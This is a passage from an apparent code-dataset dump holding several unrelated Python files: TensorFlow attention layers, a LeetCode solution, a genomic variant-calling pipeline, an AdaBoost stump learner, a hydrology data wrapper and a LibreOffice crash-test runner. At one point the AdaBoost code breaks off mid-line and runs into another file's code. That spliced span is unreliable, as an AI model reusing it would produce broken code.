tf.ones_like(X_id, dtype='int32') * padding_index\n condition = tf.equal(padding_id, X_id)\n seq_len = tf.reduce_sum(tf.where(condition, tf.zeros_like(X_id, dtype='int32'), tf.ones_like(X_id, dtype='int32')),axis=-1)\n return seq_len\n\n def biSRU(self,X,seq_len,dim,name=''):\n \"\"\"\n\n :param X: (batch size, max sent len, word dim)\n :param seq_len: (batch size,)\n :param name:\n :return: (batch size, max sent len, rnn dim)\n \"\"\"\n with tf.variable_scope('biSRU_'+name, reuse=tf.AUTO_REUSE):\n # define parameters\n fw_cell = tf.contrib.rnn.SRUCell(\n dim / 2\n )\n bw_cell = tf.contrib.rnn.SRUCell(\n dim / 2\n )\n\n outputs, _ = tf.nn.bidirectional_dynamic_rnn(\n cell_fw=fw_cell,\n cell_bw=bw_cell,\n inputs=X,\n sequence_length=seq_len,\n dtype=tf.float32)\n\n outputs = tf.concat(outputs, axis=-1)\n return outputs\n\n def max_pooling(self,X,mask):\n \"\"\"\n\n :param X: (batch size, max sentence len, max word len, char dim)\n :param mask: binary mask (batch size, max sent len, max word len, char dim)\n :return: (batch size, max sent len, char dim)\n \"\"\"\n condition = tf.equal(mask,tf.ones_like(mask)*self.config['model']['padding_char_index'])\n # -inf mask\n mask = tf.where(condition,tf.ones_like(mask)*(-float('inf')),tf.zeros_like(mask))\n X = tf.add(X,mask)\n # (batch size, max sent len, char dim)\n X = tf.reduce_max(X,axis=-2)\n condition = tf.is_inf(X)\n X = tf.where(condition,tf.zeros_like(X),X)\n return X\n\n def attr_matrix(self,name=''):\n \"\"\"\n\n :return: (attr num, rnn dim)\n \"\"\"\n A = tf.get_variable(name='attr_matrix_'+name,\n initializer=self.parameter_initializer(shape=(self.config['model']['attr_num'],self.config['model']['biSRU']['rnn_dim'])),\n dtype='float32')\n # norm = tf.contrib.layers.l2_regularizer(self.config['model']['reg_rate'])(A)\n # tf.add_to_collection('reg', norm)\n return A\n\n def attention(self,A,X,X_id):\n \"\"\"\n\n :param A: (attr num, rnn dim)\n :param X: (batch size, max sentence len, rnn dim)\n :param X_id: (batch size, max sentence len)\n :return: (batch size, attr num, max sent len)\n \"\"\"\n X_id = tf.cast(X_id, dtype='float32')\n padding_id = tf.ones_like(X_id, dtype='float32') * self.config['model']['padding_word_index']\n is_padding = tf.equal(X_id, padding_id)\n # (batch size, max sentence len)\n mask = tf.where(is_padding,\n tf.zeros_like(X_id, dtype='float32'),\n tf.ones_like(X_id, dtype='float32'))\n # (batch size, max sentence len, attr num)\n temp = tf.clip_by_value(tf.tensordot(X,A,axes=[[2],[1]]),\n clip_value_min=tf.constant(-self.config['model']['clip_value']),\n clip_value_max=tf.constant(self.config['model']['clip_value']))\n # (attr num, batch size, max sent len)\n temp = tf.transpose(temp,perm=(2,0,1))\n temp = tf.multiply(mask,tf.exp(temp))\n # (attr num, batch size, 1)\n denominator = tf.reduce_sum(temp, axis=2, keepdims=True)\n # (attr num, batch size, max sent len)\n denominator = tf.tile(denominator,multiples=[1,1,self.config['model']['max_sent_len']])\n # (attr num, batch size, max sent len)\n att = tf.truediv(temp,denominator)\n # (batch size, attr num, max sent len)\n att = tf.transpose(att,perm=(1,0,2))\n return att\n\n def sent_repr(self,att,X):\n \"\"\"\n\n :param att: (batch size, attr num, max sent len)\n :param X: (batch size, max sent len, rnn dim)\n :return:(batch size, attr num, rnn dim)\n \"\"\"\n # (batch size, attr num, rnn dim)\n sent_repr = tf.matmul(att,X)\n return sent_repr\n\n def senti_score(self,sent_repr):\n \"\"\"\n\n :param sent_repr: (batch size, attr num, sep bisru layers num * rnn dim)\n :return: (batch size, attr num, senti num)\n \"\"\"\n # (senti num, rnn dim)\n W = tf.get_variable(name='senti_score_W',initializer=self.parameter_initializer(shape=(self.config['model']['senti_num'],\n self.config['model']['biSRU']['separated_layers_num']*\n self.config['model']['biSRU']['rnn_dim']),\n dtype='float32'))\n norm = tf.contrib.layers.l2_regularizer(self.config['model']['reg_rate'])(W)\n tf.add_to_collection('reg',norm)\n # (batch size, attr num, senti num)\n score = tf.tensordot(sent_repr,W,axes=[[2],[1]])\n\n return score\n\n def senti_prediction(self,score):\n \"\"\"\n\n :param score: (batch size, attr num, senti num)\n :return:\n \"\"\"\n # (batch size, attr num, senti num)\n temp = tf.nn.softmax(score,axis=-1)\n senti_pred = tf.where(tf.equal(tf.reduce_max(temp, axis=2, keep_dims=True), temp), tf.ones_like(temp),\n tf.zeros_like(temp))\n return senti_pred\n\n def senti_loss(self,logits,labels):\n \"\"\"\n\n :param logits: (batch size, attr num, senti num)\n :param labels: (batch size, attr num, senti num)\n :return:\n \"\"\"\n reg = tf.get_collection('reg')\n loss = tf.reduce_mean(tf.add(\n tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits_v2(labels=labels, logits=logits, dim=-1), axis=1),\n tf.reduce_sum(reg)))\n return loss","sub_path":"base_withCharEmb/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":9526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"361151163","text":"class Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if not nums: return 0\n tmp = nums[0]\n counter = 0\n for i in range(1,len(nums)):\n if nums[i] != tmp:\n tmp = nums[i]\n counter += 1\n nums[counter] = tmp\n return counter + 1\n","sub_path":"Week01/remove-duplicates-from-sorted-array.py","file_name":"remove-duplicates-from-sorted-array.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"132865946","text":"import getopt, sys, os\nimport subprocess\nfrom os import path\n\ndef variant_discoverer(first_coordinate, last_coordinate, max_read_len, rDNA_unit_size):\n\t#change file to linux format\n\tprocess_cat = subprocess.Popen(['cat', ref_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\twith open ('fixed.fasta', 'w') as fixedfile:\n\t\tsubprocess.Popen(['tr', '-d', '\\'\\\\r\\''], stdin=process_cat.stdout, stdout=fixedfile, stderr=subprocess.PIPE).wait()\n\t#trim reference file\n\tsubprocess.Popen([python, 'fasta_trimmer.py', 'fixed.fasta', 'ref_trm.fasta', '{0}'.format(first_coordinate), '{0}'.format(last_coordinate)]).wait()\n\t#Index fasta with bwa\n\ttry:\n\t\tsubprocess.Popen(['bwa', 'index', 'ref_trm.fasta'], stderr=subprocess.PIPE).wait()\n\texcept OSError:\n\t\tprint('Error10: Cannot find bwa.')\n\t\tsys.exit(2)\n\t#Index fasta with samtool\n\ttry:\n\t\tsubprocess.Popen(['samtools', 'faidx', 'ref_trm.fasta'], stderr=subprocess.PIPE)\n\texcept OSError:\n\t\tprint('Error11: Cannot find samtools.')\n\t\tsys.exit(2)\n\t#Map the reads with bwa\n\tprocess_align_reads = subprocess.Popen(['bwa', 'mem', 'ref_trm.fasta', fwd_reads_file, rvs_reads_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#filter unmapped reads with samtools\n\tprocess_filter_unmapped_reads = subprocess.Popen(['samtools', 'view', '-h', '-F', '4'], stdin=process_align_reads.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#filter reads with soft clippings with software available at https://github.com/tseemann/samclip\n\ttry:\n\t\tprocess_filter_softclipped_reads = subprocess.Popen(['samclip', '--ref', 'ref_trm.fasta', '--max', '0'], stdin=process_filter_unmapped_reads.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\texcept OSError:\n\t\tprint('Error12: Cannot find samclip.')\n\t\tsys.exit(2)\n\t#Convert file to BAM format for the next tool\n\twith open ('bamfile.bam', 'w') as bamfile:\n\t\tsubprocess.Popen(['samtools', 'view', '-bS'], stdin=process_filter_softclipped_reads.stdout, stdout=bamfile, stderr=subprocess.PIPE).wait()\n\t#Use Prithika's new Python tool to convert CIGAR strings to CIGAR2 strings software available from Prithika\n\tsubprocess.Popen([python, 'fat-cigar.py', 'linear', 'bamfile.bam', 'CG2.bam'], stderr=subprocess.PIPE).wait()\n\t#Convert the BAM files back to SAM format for CIGAR2 filtering\n\twith open ('CG2.sam', 'w') as samfile:\n\t\tsubprocess.Popen(['samtools', 'view', '-h', 'CG2.bam'], stdout=samfile, stderr=subprocess.PIPE).wait()\n\t#Copy header from the sam file\n\twith open ('ch.sam', 'w') as chfile:\n\t\tsubprocess.Popen(['samtools', 'view', '-H', 'CG2.sam'], stdout=chfile, stderr=subprocess.PIPE)\n\t#CIGAR2 filtering - only keep reads if they they have at least 20 nucleotide matches at each end of the read\n\twith open ('filtered.sam', 'w') as filteredfile:\n\t\tsubprocess.Popen(['awk', '($6 ~ /^[2-9][0-9]=.*[2-9][0-9]=$/) || ($6 ~ /^[2-9][0-9]=.*1[0-9]{2}=$/) || ($6 ~ /^1[0-9]{2}=.*[2-9][0-9]=$/) || ($6 ~ /^[1-9][0-9]{1,2}=$/)', 'CG2.sam'], stdout=filteredfile, stderr=subprocess.PIPE).wait()\n\t#Add the header to the CIGAR2-filtered files as the filtering step lost it\n\tprocess_add_header = subprocess.Popen(['cat', 'ch.sam', 'filtered.sam'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#Convert the CIGAR2-filtered SAM files to BAM format\n\twith open ('back.bam', 'w') as bamfile:\n\t\tif float(sub_sample) < 1.0:\n\t\t\tsubprocess.Popen(['samtools', 'view', '-bS', '-s', sub_sample], stdin=process_add_header.stdout, stdout=bamfile, stderr=subprocess.PIPE).wait()\n\t\telse:\n\t\t\tsubprocess.Popen(['samtools', 'view', '-bS'], stdin=process_add_header.stdout, stdout=bamfile, stderr=subprocess.PIPE).wait()\n\t#Stack the filtered reads under the reference - up to maximum depth using freebayes\n\twith open ('vcfile.vcf', 'w') as vcfile:\n\t\ttry:\n\t\t\tsubprocess.Popen(['freebayes', '-f', 'ref_trm.fasta', '-F', '0.001', '--pooled-continuous', 'back.bam'], stdout=vcfile, stderr=subprocess.PIPE).wait()\n\t\texcept OSError:\n\t\t\tprint('Error13: Cannot find freebayes.')\n\t\t\tsys.exit(2)\n\t#Break multi-allelic sites\n\ttry:\n\t\tprocess_breakmulti = subprocess.Popen(['vcfbreakmulti', 'vcfile.vcf'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\texcept OSError:\n\t\tprint('Error14: Cannot find vcflib.')\n\t\tsys.exit(2)\n\t#Decompose biallelic sites\n\tprocess_allelicprimitives = subprocess.Popen(['vcfallelicprimitives', '-kg'], stdin=process_breakmulti.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#Fix the field of alternate allelic depth\n\tprocess_fix_depth = subprocess.Popen(['./vcf_ad_fix.sh'], stdin=process_allelicprimitives.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\t#normalise the vcf\n\ttry:\n\t\tprocess_normalise = subprocess.Popen(['bcftools', 'norm', '-f', 'ref_trm.fasta', '-m-'], stdin=process_fix_depth.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\texcept OSError:\n\t\tprint('Error15: Cannot find bcftools.')\n\t\tsys.exit(2)\n\t#relocate variants\n\tsubprocess.Popen([python, 'variant_relocator.py', 'relocated.vcf', str(max_read_len), str(rDNA_unit_size+max_read_len-1), '0'], stdin=process_normalise.stdout, stderr=subprocess.PIPE).wait()\n\t#sort variants\n\twith open ('sorted.vcf', 'w') as sortedfile: #file object to write on the file\n\t\tsubprocess.Popen(['bcftools', 'sort', 'relocated.vcf'], stdout=sortedfile, stderr=subprocess.PIPE).wait()\n\t#unify decomposed variants\n\tsubprocess.Popen([python, 'variant_unifier.py', 'sorted.vcf', 'unified.vcf', '1']).wait()\n\t#unify relocated variants\n\tsubprocess.Popen([python, 'variant_unifier.py', 'unified.vcf', 'unified2.vcf', '0']).wait()\n\t#filter variants\n\twith open ('filtered.vcf', 'w') as filteredfile: #file object to write on the file\n\t\tsubprocess.Popen(['vcffilter', '-f', 'AO > 1 & AO / DP > 0.005', 'unified2.vcf'], stdout=filteredfile, stderr=subprocess.PIPE) #filtering the variants\n\t#retrieve frquency\n\tsubprocess.Popen([python, 'frequency_retriever.py', str(max_read_len-1), str(rDNA_unit_size), out_vcf]).wait()\n\n#function to delete all intermediate files\ndef delete_all_interim_files():\n\t#delete interim reference file\n\tsubprocess.Popen(['rm', 'fixed.fasta'])\n\t#deleting the fat-cigar bam file\n\tsubprocess.Popen(['rm', 'CG2.bam'])\n\t#deleting the fat-cigar sam file\n\tsubprocess.Popen(['rm', 'CG2.sam'])\n\t#delete header of sam\n\tsubprocess.Popen(['rm', 'ch.sam'])\n\t#delete sam without header\n\tsubprocess.Popen(['rm', 'filtered.sam'])\n\t#delete fat-cigar filtered bam file\n\tsubprocess.Popen(['rm', 'back.bam'])\n\t#delete vcf file\n\tsubprocess.Popen(['rm', 'vcfile.vcf'])\n\t#delete relocated vcf file\n\tsubprocess.Popen(['rm', 'relocated.vcf'])\n\t#delete sorted vcf file\n\tsubprocess.Popen(['rm', 'sorted.vcf'])\n\t#delete unified vcf file\n\tsubprocess.Popen(['rm', 'unified.vcf'])\n\t#delete unified2 vcf\n\tsubprocess.Popen(['rm', 'unified2.vcf'])\n #delete bam file\n\tsubprocess.Popen(['rm', 'bamfile.bam'])\n\t#delete sorted bam file\n\tsubprocess.Popen(['rm', 'bamfile_sorted.bam'])\n\t#delete index of sorted bam file\n\tsubprocess.Popen(['rm', 'bamfile_sorted.bam.bai'])\n\t#delete head removed vcf\n\tsubprocess.Popen(['rm', 'vcf_hr.vcf'])\n\t#delete the trimmed reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta'])\n\t#delete the amb index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.amb'])\n\t#delete the ann index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.ann'])\n\t#delete the bwt index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.bwt'])\n\t#delete the fai index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.fai'])\n\t#delete the pac index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.pac'])\n\t#delete the sa index of reference fasta file\n\tsubprocess.Popen(['rm', 'ref_trm.fasta.sa'])\n\t#delete relocated frequency retrieved vcf\n\tsubprocess.Popen(['rm', 'relocated_fr.vcf'])\n\t#delete sorted frequency retrieved vcf\n\tsubprocess.Popen(['rm', 'sorted_fr.vcf'])\n\t#delete unified frequency retrieved vcf\n\tsubprocess.Popen(['rm', 'unified_fr.vcf'])\n\t#delete unified frequency retrieved vcf\n\tsubprocess.Popen(['rm', 'unified_fr2.vcf'])\n\t#delete filtered vcf file\n\tsubprocess.Popen(['rm', 'filtered.vcf'])\n\t#delete filtered frequency vcf file\n\tsubprocess.Popen(['rm', 'filtered_fr.vcf'])\n\n#function to find maximum read length\ndef find_max_read_length():\n\tmax_read_length = subprocess.Popen(['awk', '{if(NR%4==2) {} max_read_length = (max_read_length > length) ? max_read_length : length} END {print max_read_length}', fwd_reads_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tmax_read_length = max_read_length.stdout.readlines()\n\tmax_read_length_fwd = int(max_read_length[0]) #maximum read length in forward read file\n\tmax_read_length = subprocess.Popen(['awk', '{if(NR%4==2) {} max_read_length = (max_read_length > length) ? max_read_length : length} END {print max_read_length}', rvs_reads_file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tmax_read_length = max_read_length.stdout.readlines()\n\tmax_read_length_rvs = int(max_read_length[0]) #maximum read length in reverse read file\n\tmax_read_length = max(max_read_length_fwd, max_read_length_rvs) #greater of forward and reverse reads\n\treturn max_read_length\n\t\t\t\t\t\n#main function\ndef main(first_coordinate, last_coordinate):\n\tmax_read_len = find_max_read_length()\t\t#function to find maximum read length\n\trDNA_unit_size = last_coordinate - first_coordinate + 1 #size of rDNA unit\n\tlast_coordinate += max_read_len - 1\t#last coordinate of trimmed fasta file\n\tfirst_coordinate -= max_read_len - 1\t#first coordinate of trimmed fasta file\n\tvariant_discoverer(first_coordinate, last_coordinate, max_read_len, rDNA_unit_size)\t#fuction to discover the variants\n\tdelete_all_interim_files()\t#function to delete all intermediate files\n\nclass take_command_line_args():\n\tdef __init__(self, args, args_len):\n\t\tglobal ref_file, first_coordinate, last_coordinate, fwd_reads_file, rvs_reads_file, sub_sample, out_vcf\n\t\tref = False\n\t\tfirst = False\n\t\tlast = False\n\t\tfwd = False\n\t\trvs = False\n\t\tout = False\n\t\tsub = False\n\t\tref_file = ''\n\t\tfwd_reads_file = ''\n\t\trvs_reads_file = ''\n\t\tsub_sample = '1.0'\t\t\t#default value\n\t\tfor i in range(0, args_len-1, 2):\n\t\t\tif args[i] == '--reference' or args[i] == '-f':\n\t\t\t\tref_file = args[i+1]\t\t\t#reference file\n\t\t\t\tref = True\n\t\t\telif args[i] == '--unit_start' or args[i] == '-u':\n\t\t\t\tif args[i+1].isdigit():\n\t\t\t\t\tfirst_coordinate = int(args[i+1]) #first coordinate of rDNA unit\n\t\t\t\t\tfirst = True\n\t\t\t\telse:\n\t\t\t\t\tprint('Error16: First coordinate must be numeric')\n\t\t\t\t\tsys.exit(2)\n\t\t\telif args[i] == '--unit_end' or args[i] == '-v':\n\t\t\t\tif args[i+1].isdigit():\n\t\t\t\t\tlast_coordinate = int(args[i+1]) #last coordinate of rDNA unit\n\t\t\t\t\tlast = True\n\t\t\t\telse:\n\t\t\t\t\tprint('Error17: Last coordinate must be numeric')\n\t\t\t\t\tsys.exit(2)\n\t\t\telif args[i] == '--reads1' or args[i] == '-r':\n\t\t\t\tfwd_reads_file = args[i+1] #forward reads file\n\t\t\t\tfwd = True\n\t\t\telif args[i] == '--reads2' or args[i] == '-q':\n\t\t\t\trvs_reads_file = args[i+1] #reverse reads file\n\t\t\t\trvs = True\n\t\t\telif args[i] == '--sub_sample' or args[i] == '-s':\n\t\t\t\tsub_sample = args[i+1]\t\t#ratio of sampled reads in the bam file\n\t\t\t\tsub = True\n\t\t\telif args[i] == '--out' or args[i] == '-o':\n\t\t\t\tout_vcf = args[i+1] #output vcf file\n\t\t\t\tout = True\n\t\t\telse:\n\t\t\t\tprint('Error0: option {0} is not recognised'.format(args[i]))\n\t\t\t\tsys.exit(2)\n\t\t#error ans warning list\n\t\tif not ref:\n\t\t\tprint('Error1: Reference file name is missing')\n\t\tif not first:\n\t\t\tprint('Error2: First coordinate of rDNA unit is missing')\n\t\tif not last:\n\t\t\tprint('Error3: Last coordinate of rDNA unit is missing')\n\t\tif not fwd:\n\t\t\tprint('Error4: Forward read file name is missing')\n\t\tif not rvs:\n\t\t\tprint('Error5: Reverse read file name is missing')\n\t\tif not out:\n\t\t\tprint('Error6: Output file name is missing')\n\t\tif ref and not path.exists(ref_file):\n\t\t\tprint('Error7: Cannot find reference file')\n\t\tif fwd and not path.exists(fwd_reads_file):\n\t\t\tprint('Error8: Cannot find read1 file')\n\t\tif rvs and not path.exists(rvs_reads_file):\n\t\t\tprint('Error9: Cannot find read2 file')\n\t\tif not ref or not first or not last or not fwd or not rvs or not out or not path.exists(ref_file) or not path.exists(fwd_reads_file) or not path.exists(rvs_reads_file):\n\t\t\tsys.exit(2)\n\t\tif sub and float(sub_sample) >= 1.0 or float(sub_sample) <= 0.0:\t\t\t#sampling ratio should always be less than 1\n\t\t\tprint('warning: Sub_sample ratio must be greater than 0 and less than 1. By default reads will not be sampled.')\n\t\t\tsub_sample = 1.0\n\tdef execute(self):\n\t\tmain(first_coordinate, last_coordinate)\t\t#adding two arguments because these are not acting as global variables for unknown reasons\n\nif __name__ == \"__main__\":\n\tpython = 'python'+str(sys.version_info.major) #python version\n\tfull_cmd_arguments = sys.argv\t# Get full command-line arguments\n\targument_list = full_cmd_arguments[1:]\t# Keep all but the first (because first is the function name)\n\tshort_options = \"f:u:v:r:q:s:o:\"\n\tlong_options = [\"reference=\", \"unit_start=\", \"unit_end=\", \"reads1=\", \"reads2=\", \"sub_sample=\", \"out=\"]\n\ttry:\n\t\targuments, values = getopt.getopt(argument_list, short_options, long_options)\n\texcept getopt.error as err:\n\t\t# Output error, and return with an error code\n\t\tprint (str(err))\n\t\tsys.exit(2)\n\targs_len = len(sys.argv)\n\targs = []\n\tfor i in range(1, args_len):\n\t\targs.append(sys.argv[i])\n\ttake_command_line_args(args, args_len).execute()\n","sub_path":"variant_discovery.py","file_name":"variant_discovery.py","file_ext":"py","file_size_in_byte":13308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"86354223","text":"# -*- coding: utf-8 -*-\n__author__ = \"shenfeng\"\nfrom numpy import *\nfrom matplotlib import pyplot as plt\ndef loadSimpData():\n datMat = matrix([[ 1. , 2.1],\n [ 2. , 1.1],\n [ 1.3, 1. ],\n [ 1. , 1. ],\n [ 2. , 1. ]])\n classLabels = [1.0, 1.0, -1.0, -1.0, 1.0]\n return datMat,classLabels\n\n#通过阈值比较进行分类,\ndef stumpClassify(datamatrix,dimen,threshVal,threshIneq):\n #参数:训练数据集矩阵,第几个特征,阈值,大于、小于符号\n retAraay=ones((shape(datamatrix)[0],1))\n if threshIneq=='lt':\n retAraay[datamatrix[:,dimen]<=threshVal]=-1\n else:\n retAraay[datamatrix[:,dimen]>threshVal]=-1\n return retAraay\n\n#找到最佳单层决策树\ndef buildStump(dataarr,lebals,D):\n #参数:训练数据集矩阵,类别标签,样本权重\n dataMat=mat(dataarr)\n\n lebalMat=mat(lebals).transpose()\n numsteps=10.0\n beststump={}\n m,n=shape(dataMat)\n bestclassset=mat(zeros((m,1)))\n minerr=inf\n for i in range(n): #对于每个向量循环\n Min=dataMat[:,i].min()\n Max=dataMat[:,i].max()\n stepsize=(Max-Min)/numsteps\n for j in range(-1,int(numsteps)+1):\n\n for Ineq in ['lt','gt']:\n threshVal=Min+float(j)*stepsize\n predictVals=stumpClassify(dataMat,i,threshVal,Ineq)\n error=mat(ones((m,1)))\n error[predictVals==lebalMat]=0\n errorWeight=D.T*error\n #print('dim : %d, thresh %.2f, threshIneq :%s , errweiget :%.3f' % (i, threshVal, Ineq, errorWeight))\n if errorWeight=0 and key ed):\n continue\n for lst, var in zip([fLst, qLst], [varF, varQ]):\n temp = pd.DataFrame({'date': ctR}).set_index(\n 'date').join(df[var])\n # temp = temp.interpolate(\n # limit=nFill, limit_direction='both', limit_area='inside')\n # give up interpolation after many thoughts\n lst.append(temp.values)\n if optC == 'end':\n cLst.append(dfC.iloc[k].values)\n elif optC == 'seq':\n tempC = pd.DataFrame({'date': ctR}).set_index(\n 'date').join(df[varC])\n cLst.append(tempC.values)\n gLst.append(tabG.loc[siteNo].values)\n infoLst.append(dict(siteNo=siteNo, date=ct))\n t2 = time.time()\n print('{} on site {} reading {:.3f} total {:.3f}'.format(\n i, siteNo, t2-t1, t2-t0))\n\n f = np.stack(fLst, axis=-1).swapaxes(1, 2).astype(np.float32)\n q = np.stack(qLst, axis=-1).swapaxes(1, 2).astype(np.float32)\n g = np.stack(gLst, axis=-1).swapaxes(0, 1).astype(np.float32)\n if optC == 'end':\n c = np.stack(cLst, axis=-1).swapaxes(0, 1).astype(np.float32)\n elif optC == 'seq':\n c = np.stack(cLst, axis=-1).swapaxes(1, 2).astype(np.float32)\n\n # save\n infoDf = pd.DataFrame(infoLst)\n saveFolder = os.path.join(kPath.dirWQ, 'trainData')\n saveName = os.path.join(saveFolder, caseName)\n np.savez(saveName, q=q, f=f, c=c, g=g)\n infoDf.to_csv(saveName+'.csv')\n dictData = dict(name=caseName, rho=rho,\n varG=varG, varC=varC, varQ=['00060'],\n varF=varF, siteNoLst=siteNoLst)\n with open(saveName+'.json', 'w') as fp:\n json.dump(dictData, fp, indent=4)\n","sub_path":"hydroDL/app/waterQuality/wqWrapData.py","file_name":"wqWrapData.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"257918570","text":"#!/usr/bin/env python\n\n# Libreoffice test-bugzilla-files control script\n# Copyright (C) 2014 Markus Mohrhard\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport os\nimport os.path\nimport concurrent.futures\nimport time\nimport subprocess\nimport getopt\nimport sys\nfrom shutil import copyfile, rmtree, disk_usage\n\ndef partition(l, n):\n for i in range(0, len(l), n):\n yield l[i:i+n]\n\ndef get_tasks(directory, files_per_task):\n flist = [os.path.join(dirpath, f) for dirpath, dirnames, fnames in os.walk(directory) for f in fnames]\n\n partitioned_list = list(partition(flist, files_per_task))\n task_files = []\n i = 0\n for list_item in partitioned_list:\n filename = \"task\" + str(i)\n task_file = open(filename, \"w\")\n for item in list_item:\n task_file.write(\"%s\\n\" % item)\n task_files.append(os.path.join(os.getcwd(),filename))\n i += 1\n print(\"number of tasks: \" + str(len(task_files)))\n return task_files\n\ndef execute_task(task_file, asan):\n print(asan)\n if asan == 1:\n subprocess.call(\"./execute_asan.sh \" + task_file + \" --asan\", shell=True)\n elif asan == 0:\n subprocess.call(\"./execute.sh \" + task_file, shell=True)\n time.sleep(1)\n os.remove(task_file)\n\ndef saveAsPreviousState(exported_files):\n odf_file_ext = ['odt', 'odp', 'odb', 'ods', 'odg']\n previous_path = os.environ[\"CRASHTESTDATA\"] + \"/previous\"\n if os.path.exists(previous_path):\n rmtree(previous_path)\n\n for ext in odf_file_ext:\n os.makedirs(previous_path + os.environ[\"CRASHTESTDATA\"] + \"/files/\"+ ext)\n\n prefix = os.environ[\"CRASHTESTDATA\"] + \"/current\"\n for file in exported_files:\n ext = file[-3:]\n if ext in odf_file_ext and os.path.exists(file):\n os.makedirs(os.path.dirname(os.environ[\"CRASHTESTDATA\"] + \"/previous\"+file[len(prefix):]), exist_ok=True)\n copyfile(file, os.environ[\"CRASHTESTDATA\"] + \"/previous\"+file[len(prefix):])\n\n SHAcmd = \"cd $SRCDIR && git rev-parse HEAD\"\n previous_SHA = str(subprocess.check_output(SHAcmd, shell=True), encoding='utf-8')\n previous_SHA_file = open(os.environ[\"CRASHTESTDATA\"] + \"/previous/hash.txt\", \"w\")\n previous_SHA_file.write(previous_SHA)\n previous_SHA_file.close()\n\ndef get_list_of_files(directory_name):\n list_of_file = os.listdir(directory_name)\n all_files = list()\n for filename in list_of_file:\n full_path = os.path.join(directory_name, filename)\n if os.path.isdir(full_path):\n all_files = all_files + get_list_of_files(full_path)\n else:\n all_files.append(full_path)\n return all_files\n\ndef checkDiskSpace():\n total, used, free = disk_usage(os.environ[\"CRASHTESTDATA\"])\n freeGiB = free // (2**30)\n disk_space_limit = int(os.environ[\"DISKSPACELIMIT\"])\n if freeGiB <= disk_space_limit:\n diskusagefile = open(os.environ[\"CRASHTESTDATA\"] + \"/diskusageinfo.txt\", \"w\")\n diskusagefile.write(str(freeGiB))\n diskusagefile.close()\n\ndef checkCPULoadAverage():\n cpuload, _, _ = os.getloadavg()\n cpuload /= float(os.cpu_count())\n cpu_loadavg_limit = float(os.environ[\"CPULOADAVGLIMIT\"])\n\n if cpuload > cpu_loadavg_limit:\n cpuusagefile = open(os.environ[\"CRASHTESTDATA\"] + \"/cpuusageinfo.txt\", \"w\")\n cpuusagefile.write(str(cpuload))\n cpuusagefile.close()\n\ndef checkMemoryUsage():\n memory_info = dict((i.split()[0].rstrip(':'),int(i.split()[1])) for i in open('/proc/meminfo').readlines())\n total_memory = memory_info['MemTotal']\n # Not Total - Free, as that would include caches as well, which is not interesting for us.\n used_memory = total_memory - memory_info['MemAvailable']\n\n usage = used_memory / total_memory\n usage_in_percent = round(round(usage, 2)*100)\n memory_limit = int(os.environ[\"MEMORYLIMIT\"])\n\n if usage_in_percent > memory_limit:\n memoryusagefile = open(os.environ[\"CRASHTESTDATA\"]+\"/memoryusageinfo.txt\", \"w\")\n memoryusagefile.write(str(usage_in_percent)+'%')\n memoryusagefile.close()\n\ndef usage():\n message = \"\"\"usage: {program} [option] dir\"\n - h | --help: print usage information\n \n 'dir' is the path to the directory with the test files\"\"\"\n print(message.format(program = os.path.basename(sys.argv[0])))\n\nif __name__ == \"__main__\":\n opts, args = getopt.getopt(sys.argv[1:], \"hd:a\", [\"help\", \"directory=\", \"asan\"])\n if \"-h\" in opts or \"--help\" in opts:\n usage()\n sys.exit()\n\n asan = 0\n if len(opts) > 0 and \"--asan\" in opts[0]:\n print(\"yeah\")\n asan = 1\n\n if len(args) == 0:\n usage()\n sys.exit(1)\n\n directory = args[0]\n\n print(directory)\n if not os.path.isdir(directory):\n print(\"no valid directory\")\n sys.exit(1)\n\n task_size = int(os.environ[\"FILESNR\"])\n workers = int(os.environ[\"WORKERS\"])\n if asan == 1:\n workers = 64\n\n checkCPULoadAverage()\n checkDiskSpace()\n checkMemoryUsage()\n with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:\n future_to_task = {executor.submit(execute_task, task_file, asan): task_file for task_file in get_tasks(directory, task_size)}\n for future in concurrent.futures.as_completed(future_to_task):\n task = future_to_task[future]\n try:\n future.result()\n except Exception as exc:\n print('%r generated an exception: %s' % (task, exc))\n else:\n print('%r successfully passed' % (task))\n\n exported_files = get_list_of_files(os.environ[\"CRASHTESTDATA\"] + \"/current/\" + os.environ[\"CRASHTESTDATA\"] + \"/files/\")\n checkDiskSpace()\n\n if os.getenv('SAVEPREVIOUSSTATE'):\n 